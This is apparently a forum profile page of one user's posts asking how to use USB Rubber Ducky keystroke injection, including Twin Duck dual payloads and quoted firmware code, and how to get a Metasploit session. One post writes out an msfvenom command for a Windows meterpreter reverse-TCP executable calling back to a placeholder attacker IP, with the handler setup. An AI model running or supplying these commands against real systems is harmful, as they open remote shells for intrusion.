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Everything posted by aideux

  1. So I was able to get the injection working, but can't seem to find the commands for interacting with the touchscreen via a keyboard.
  2. Hmmm, I'll give it a shot, and post back what I find! Thanks for the tip!
  3. Do you know what the syntax is for the touchscreen (swiping left, right; tapping, etc.)?
  4. Is a Ducky compatible with iPhones? If so, can someone provide some documentation for how scripts for iPhone are written? Also, for those successful in these attacks, what adapter did you use to connect the ducky to the phone? Thanks!
  5. Okay, do you know if the key (caps or num) needs to be pressed prior to ducky insertion, or if you insert the ducky and then press the key?
  6. Hm I see that. Looks like it is "inject.bin" and "inject2.bin". Also, num lock would affect payload 1 and caps would initiate payload 2? This block of code makes me think that: void ui_kbd_led(uint8_t value) { if(!in_affect){ //this is called when LEDs CAPS LCK, NUM LCK change if (value & HID_LED_NUM_LOCK) { // Here, turn on Num LED LED_On( LED1 ); in_affect=true; //use injectarray state = state_START_INJECT; } else{ // Here, turn off Num LED LED_Off( LED1 ); } if (value & HID_LED_CAPS_LOCK) { // Here, turn on CAPS LED LED_On( LED0 ); in_affect=true; //use injectarray2 for (int c=0;c<(sizeof(inject_array2));c++){ inject_array[c]=inject_array2[c]; } state = state_START_INJECT; } else{ // Here, turn off CAPS LED LED_Off( LED0 ); } } } I haven't written in C in a while, though, so I'm not sure if injectarray = inject.bin / injectarray2 = inject2.bin. Can anyone confirm? Also, does the key (caps lock or num lock) need to be active for the payload to work, or does one put the ducky in first, and then press the corresponding button? I'm not with it right now, or I would test this, but I'd love to know from someone more knowledgeable.
  7. What do I need to name the payloads, and is the setup any different, or is it like “inject.bin” and “inject2.bin”. Thanks :)
  8. I understand how to script payloads and write them to the Ducky, but I'm a little confused as to how to get the two payloads working using Twin Ducks. I understand that one payload would be executed when Caps Lock is active and the Ducky is inserted, while the other would work when Num Lock is active before the Ducky is inserted, but I'm unsure as to how to get the Ducky to differentiate between the two payloads. I'm assuming there are two inject.bin files that are named differently, but I would love if someone could explain this process a little further for me, as I can't seem to find any Twin Ducks documentation anywhere. Thank you! P.S. Already posted this in the Ducky GitHub, but it doesn't really look like the "Issues" tab gets much activity, so I thought I'd post here too. Just for anyone wondering why I didn't start there.
  9. For some reason, I keep getting an issue where, when the victim double-clicks on the payload, a session is opened, but not the console that would allow me to use meterpreter. To create the payload, I use this code: msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=[attacker IP address] LPORT=5555 -o /root/Desktop/[filename].exe Then, in the metasploit console, I type: use multi/handler set payload windows/meterpreter_reverse_tcp set LHOST [attacker IP address] set LPORT 5555 exploit Then, a session is opened, but the line that looks like "meterpreter>" does not open. I have tried using different ports, and have also attempted to use ngrok, which did not work. The system I am attacking is my own windows 10 VM. Can someone please help me out? I am new to using metasploit, and would love some advice.
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